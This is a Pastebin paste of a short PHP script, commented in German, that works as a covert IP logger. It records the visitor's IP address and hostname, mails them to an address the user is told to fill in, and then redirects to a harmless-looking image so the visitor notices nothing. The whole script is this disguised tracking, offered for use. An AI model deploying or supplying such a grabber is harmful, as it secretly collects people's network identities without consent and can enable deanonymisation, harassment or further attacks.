Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $IP = $_SERVER['REMOTE_ADDR'];
- $HOST = gethostbyaddr($_SERVER['REMOTE_ADDR']);
- mail("HIER DEINE MAIL EINTRAGEN", "IP von: ".$HOST."Diese Daten wurden mittels Php gesendet.
- IP: ".$IP."
- Host :".$HOST);
- header('Location: http://allrights.nicobartes.com/facebook-sprueche/wp-content/uploads/2013/02/45-This-is-a-nudelholz.jpg');
- exit();
- ?>
Advertisement